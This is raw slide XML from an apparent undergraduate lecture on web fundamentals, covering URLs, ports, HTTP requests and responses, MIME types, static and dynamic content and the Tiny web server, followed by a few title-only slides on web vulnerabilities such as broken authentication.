              <a:t> DNS server to get IP address for </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>www.amazon.com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sz="1700" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>http://www.cs.pomona.edu:80/classes/cs105/index.html</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="17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http://www.cs.pomona.edu:80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Where the server is (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>www.cs.pomona.edu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 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90373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Well-known Ports and Service Names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Popular services have permanently assigned </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>well-known ports </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0"/>
              <a:t>and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>corresponding </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" i="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>well-known service names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echo server: 7/echo</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>ssh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> servers: 22/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>ssh</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>email server: 25/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>smtp</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Web servers: 80/http or 443/https</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Mappings between well-known ports and service names is contained in the file </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>etc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>/services </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>on each Linux machine.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8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sz="1700" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>http://www.cs.pomona.edu:80/classes/cs105/index.html</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="17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http://www.cs.pomona.edu:80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Where the server is (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>www.cs.pomona.edu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 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endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Servers use </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>suffix</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00CC66"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>/classes/cs105/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="00CC66"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>index.html</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>) to:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Specify what content they want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021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92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304800" y="1673352"/>
            <a:ext cx="4184650" cy="4718304"/>
          </a:xfrm>
          <a:noFill/>
          <a:ln/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="90343" tIns="44379" rIns="90343" bIns="44379"/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>Clients and servers communicate using  the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>HyperText</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> Transfer Protocol (HTTP)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>Client and server establish TCP connection</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>Client requests content</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>Server responds with requested content</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>Client and server close connection (eventually)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>Current version is HTTP/2.0</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>RFC 7540, 2015</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>Includes protocol negotiation</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>HTTP/1.1 still in use (RFC 2616, 1999)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>HTTP/3 proposed</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1800" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="758787" name="Oval 3"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7546975" y="1676400"/>
            <a:ext cx="1368425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>
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Web</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr" defTabSz="912813"/>
            <a:r>
              <a:rPr lang="en-US" sz="1800">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>server</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="758788" name="Line 4"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5859463" y="1976438"/>
            <a:ext cx="17494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5781675" y="1594132"/>
            <a:ext cx="1611569" cy="369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request</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="758790" name="Line 6"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6011863" y="2584450"/>
            <a:ext cx="1446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91577" tIns="45789" rIns="91577" bIns="45789" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="758791" name="Text Box 7"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5789613" y="2708964"/>
            <a:ext cx="1749177" cy="646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430" tIns="45716" rIns="91430" bIns="45716" anchor="ctr">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr defTabSz="912813"/>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>HTTP </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>response</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr defTabSz="912813"/>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>(content)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="758793" name="Oval 9"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4641850" y="1676400"/>
            <a:ext cx="1370013" cy="1287463"/>
          </a:xfrm>
          <a:prstGeom prst="ellipse">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="F1C7C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/>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Web</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr" defTabSz="912813"/>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>client</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr" defTabSz="912813"/>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="+mn-lt"/>
              </a:rPr>
              <a:t>(browser) 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217219" y="4953000"/>
            <a:ext cx="1828800" cy="609600"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="D5F1CF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IP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17219" y="4343400"/>
            <a:ext cx="1828800" cy="609600"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="F6F5BD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TCP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217219" y="3733800"/>
            <a:ext cx="1828800" cy="609600"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="F1C7C7"/>
          </a:solidFill>
          <a:ln w="28575">
            <a:solidFill>
              <a:srgbClr val="C00000"/>
            </a:solidFill>
            <a:miter lim="800000"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HTTP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6019" y="5149334"/>
            <a:ext cx="121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Datagrams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6019" y="4507468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Streams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6019" y="3865602"/>
            <a:ext cx="1412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Web content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C132DA6-61D3-BD44-BC93-4B491F51C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en-US" dirty="0"/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166013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HTTP Requests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r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>HTTP request is a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>request line</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>, followed by zero or more </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>request headers</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Request line: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>&lt;method&gt; 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 &lt;version&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>&lt;method&gt; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>is one of  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>GET, POST, OPTIONS, HEAD, PUT, DELETE, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>or</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> TRACE</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>uri</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> is typically URL for proxies, URL suffix for servers</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>A URL is a type of URI (Uniform Resource Identifier)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>See </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>http://www.ietf.org/rfc/rfc2396.txt</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>&lt;version&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> is HTTP version of request (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>HTTP/1.0</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> or </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>HTTP/1.1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Request headers: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>&lt;header name&gt;: &lt;header data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Provide additional information to the server</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/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12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HTTP Responses</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="76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HTTP response is a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>response line </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>followed by zero or more </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>response headers</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>, possibly followed by </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>content</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="85000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>a blank line (“</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>\r\n</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>”) separates headers from content. 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line: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>&lt;version&gt; &lt;status code&gt; &lt;status </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>msg</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>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&lt;version&gt; is HTTP version of the response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code&gt; is numeric status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&lt;status </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>msg</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>&gt; is corresponding English text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200 	OK		Request was handled without error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301	Moved		Provide alternate URL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404	Not found	Server couldn’t find the file</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2">
              <a:lnSpc>
                <a:spcPct val="97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Response headers: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>&lt;header name&gt;: &lt;header data&gt;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Provide additional information about response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Content-Type: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>MIME type of content in response body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Content-Length: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Length of content in response body</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="8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6669B-5075-2243-8BCD-290EB0F88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990600"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>What is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485065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Web Content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32739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4403725" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Web servers return content to clients</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:tabLst>
                <a:tab pos="4403725" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0"/>
              <a:t>content: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>a sequence of bytes with an associated MIME (Multipurpose Internet Mail Extensions) type</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:tabLst>
                <a:tab pos="4403725" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:tabLst>
                <a:tab pos="4403725" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Example MIME types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text/html	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>HTML</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> document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text/plain	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Unformatted text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image/gif	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Binary image encoded in GIF format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/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>image/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>png</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Binar</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> image encoded in PNG format</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:tabLst>
                <a:tab pos="4403725" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>image/jpeg</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>	Binary image encoded in JPEG format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832939"/>
            <a:ext cx="863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+mn-lt"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>You can find the complete list of MIME types at:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="0" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>http://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="0" dirty="0" err="1">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>www.iana.org</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="0" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>/assignments/media-types/media-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="0" dirty="0" err="1">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>types.xhtml</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1800" b="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27532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294" tIns="45647" rIns="91294" bIns="45647" anchor="t">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Static and Dynamic Content</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="76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lIns="91294" tIns="45647" rIns="91294" bIns="45647">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The content returned in HTTP responses can be either </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>static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dynamic</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0"/>
              <a:t>Static content</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>: content stored in files and retrieved in response to an HTTP request</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Examples: HTML files, images, audio clips</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Request identifies which content file</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0"/>
              <a:t>Dynamic content</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>: content produced on-the-fly in response to an HTTP request</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Example: content produced by a program executed by the server on behalf of the client</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Request identifies file containing executable code</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Bottom line: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0"/>
              <a:t>Web content is associated with a file that is managed by the server</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1863454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Tiny Web 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Tiny Web server</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0"/>
              <a:t>Tiny is a sequential Web server</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0"/>
              <a:t>Serves static and dynamic content to real browsers</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>text files, HTML files, GIF, PNG, and JPEG images</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0"/>
              <a:t>239 lines of commented C code</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0"/>
              <a:t>Not as complete or robust as a real Web server</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0"/>
              <a:t>You can break it with poorly-formed HTTP requests (e.g., terminate lines with “\n” instead of “\r\n”)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="505901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FA91A7-1BA7-124D-8DAD-574BCA9E89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Vulnerabilities by Year</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="48364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Vulnerability Occurrence in Applications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583CF4B-8722-424F-ADC0-6C08284531B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6273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AA53B-D901-854E-902F-649A3F039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Broken Authentication</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Content Placeholder 4" descr="A picture containing chart, diagram&#10;&#10;Description automatically generated">
            <a:extLst>
